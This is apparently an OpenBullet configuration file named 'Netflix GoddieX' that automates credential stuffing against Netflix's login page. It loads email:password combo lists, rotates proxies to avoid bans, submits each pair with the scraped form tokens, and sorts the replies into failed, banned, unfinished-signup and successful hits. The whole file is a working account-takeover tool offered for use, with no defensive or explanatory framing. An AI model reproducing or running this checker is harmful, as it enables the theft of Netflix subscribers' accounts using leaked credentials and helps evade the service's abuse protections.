[SETTINGS]
{
  "Name": "Netflix GoddieX",
  "SuggestedBots": 25,
  "LastModified": "2019-04-07T16:18:36.7064231+07:00",
  "AdditionalInfo": "Needs HQ&Alive Proxies",
  "Author": "GoddieX",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.netflix.com/tn-en/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#authURL PARSE "<SOURCE>" LR "=\"authURL\" value=\"" "=\"/>" Recursive=FALSE -> VAR "authURL" "" "" 
#countryCode PARSE "<SOURCE>" LR "=\"countryCode\" value=\"" "\"/>" Recursive=FALSE -> VAR "countryCode" "" "" 
#countryIsoCode PARSE "<SOURCE>" LR "=\"countryIsoCode\" value=\"" "\"/>" Recursive=FALSE -> VAR "countryIsoCode" "" "" 
#withFields PARSE "<SOURCE>" LR "=\"withFields\" value=\"" "\"/>" Recursive=FALSE -> VAR "withFields" "" "" 
#action PARSE "<SOURCE>" LR "=\"action\" value=\"" "\"/>" Recursive=FALSE -> VAR "action" "" "" 
#mode PARSE "<SOURCE>" LR "=\"mode\" value=\"" "\"/>" Recursive=FALSE -> VAR "mode" "" "" 
#flow PARSE "<SOURCE>" LR "=\"flow\" value=\"" "\"/>" Recursive=FALSE -> VAR "flow" "" "" 
#nextPage PARSE "<SOURCE>" LR "=\"nextPage\" value=\"\"/>" "<" Recursive=FALSE -> VAR "nextPage" "" "" 
#showPassword PARSE "<SOURCE>" LR "=\"showPassword\" value=\"\"/>" "<" Recursive=FALSE -> VAR "showPassword" "" "" 
#Login REQUEST POST "https://www.netflix.com/tn-en/login" AutoRedirect=TRUE 
  CONTENT "userLoginId=<USER>&password=<PASS>&flow=<flow>&mode=<mode>&action=<action>&withFields=<withFields>&authURL=<authURL>%3D&nextPage=<nextPage>&showPassword=<showPassword>&countryCode=<countryCode>&countryIsoCode=<countryIsoCode>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Incorrect password" 
    KEY "Sorry, we can't find an account with this email address" 
  KEYCHAIN Ban OR 
    KEY "We are having technical difficulties and are actively working on a fix" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY ">FINISH SIGN UP<" 
  KEYCHAIN Success OR 
    KEY "Manage Profiles" 
